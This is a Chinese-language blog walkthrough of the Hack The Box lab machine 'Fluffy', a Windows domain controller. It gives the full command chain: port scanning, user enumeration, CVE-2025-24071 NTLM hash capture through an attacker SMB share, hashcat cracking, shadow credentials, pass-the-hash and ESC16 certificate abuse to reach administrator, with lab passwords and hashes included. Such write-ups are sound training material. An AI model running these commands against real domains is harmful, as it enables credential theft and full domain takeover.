HTB-Fluffy

HTB-Fluffy

扫描全端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
rustscan -a 10.10.11.69 --range 1-65535 -- -sV
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3268
Open 10.10.11.69:3269
Open 10.10.11.69:5985
Open 10.10.11.69:9389
Open 10.10.11.69:49667
Open 10.10.11.69:49678
Open 10.10.11.69:49681
Open 10.10.11.69:49695
Open 10.10.11.69:49701
Open 10.10.11.69:49677
Open 10.10.11.69:49738
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sV -vvv -p 53,88,139,389,445,464,593,636,3268,3269,5985,9389,49667,49678,49681,49695,49701,49677,49738 10.10.11.69

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-24 22:15 -06
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 22:15
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 22:15, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:15
Completed Parallel DNS resolution of 1 host. at 22:15, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:15
Scanning 10.10.11.69 [19 ports]
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 49678/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 49701/tcp on 10.10.11.69
Discovered open port 49738/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 49677/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 49695/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 49681/tcp on 10.10.11.69
Discovered open port 49667/tcp on 10.10.11.69
Completed SYN Stealth Scan at 22:15, 0.55s elapsed (19 total ports)
Initiating Service scan at 22:15
Scanning 19 services on 10.10.11.69
Completed Service scan at 22:16, 58.08s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 1.27s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 0.87s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-05-24 22:15:47 -06 for 61s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-25 10:54:53Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49738/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.86 seconds
Raw packets sent: 23 (988B) | Rcvd: 20 (864B)

给了一个初始的用户名和密码,枚举域内的用户。

1
2
3
4
ldapsearch -x -H ldap://Fluffy.HTB -D "j.fleischman@Fluffy.htb" -w 'J0elTHEM4n1990!' -b "DC=Fluffy,DC=htb" "(objectClass=user)" sAMAccountName

或者是:
crackmapexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users

收集一下字典信息。

可以直接用以下命令:

1
nxc smb Fluffy.HTB -u 'j.fleischman' -p 'J0elTHEM4n1990!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

image-20250525195623437

bloodhound分析一下。

1
bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip

image-20250525200203601

如果是这种情况的话就是vpn的时区和kali的时区问题。

域时间对齐

利用ntpdate对齐:

1
ntpdate dc01.Fluffy.htb

强制对齐:

1
chronyd -q "server 10.10.11.69 iburst"

这里利用的ntpdate对齐时间。

image-20250525205704183

如上图,就没上面的报错了。

SMB&cve-2025-24071

没找到啥有用的信息,然后尝试利用SMB共享,账号密码就是给的那个。

image-20250526203328603

1
crackmapexec smb 10.10.11.69 -u  'j.fleischman' -p  'J0elTHEM4n1990!' --shares 

image-20250526203737539

IT里面存在一些东西。

image-20250526204716579

给了一个cve-2025-24071的exp,和一个pdf文件(里面是该系统存在的一些CVE信息)以及一个zip文件(里面是everything这个工具)

image-20250526210227773

尝试打这个CVE 2025-24071

首先制作一个zip文件,然后上传到IT目录下,只有这个目录才能上传文件。

这个-i 是vpn的ip地址

image-20250526214746790

开启一个smb共享。

1
impacket-smbserver share ./share -smb2support

然后再将生成的zip文件利用smbclient上传到IP文件下。

1
smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"

然后这个时候就会再smb共享下得到NTLM-hash.

image-20250526215002488

hashcat爆破一下。

1
hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

image-20250526220137013

得到密码。

影子凭证

winrm是不能直接登录的,再次利用bloodhound收集域信息。

1
bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip

image-20250526225917104

攻击利用如下:

首先P.AGILA用户属于MANAGERS组,MANAGERS组对ACCOUNTS组有GenericAll权限,可以将P.AGILA用户添加到ACCOUNTS组中,ACCOUNTS组对所属的三个用户有GenericWrite权限,打一个影子凭证,去控制winrm_svc用户。

首先将P.AGILA用户加到ACCOUNTS组中:

1
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

然后打影子凭证:

1
certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account winrm_svc

利用上面的命令直接获取到winrm_svc的hash值,注意需要对齐时间。

image-20250527223919918

1
evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

在桌面发现user.txt

ESC16

提权:

如果一个账户能够修改自身的某些关键 AD 属性,并且证书颁发机构 (CA) 在颁发证书时会使用这些属性来确定证书的身份,那么就可以通过临时修改这些属性来“欺骗”CA 颁发一个代表其他用户(如管理员)的证书。UPN 就是这样一个关键属性.

获取ca_svc的hash

image-20250528162402816

1
certipy-ad find -u ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout -vulnerable -dc-ip 10.10.11.69  //查看容易遭受的漏洞

image-20250528181653158

1
2
3
4
5
6
7
8
9
10
11
12
1.把 ca_svc用户的 UPN 改为administrator
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

2.向证书颁发机构(CA)请求证书,请求的模板是 user证书模板
certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

3:把 UPN 改回成ca_svc恢复原貌
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

4.使用证书进行认证,得到高权限用户哈希
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

image-20250528182701073

最后evil-winrm登录即可。


HTB-Fluffy
http://example.com/2025/05/25/HTB-Fluffy/
作者
FSRM
发布于
2025年5月25日
更新于
2025年5月28日
许可协议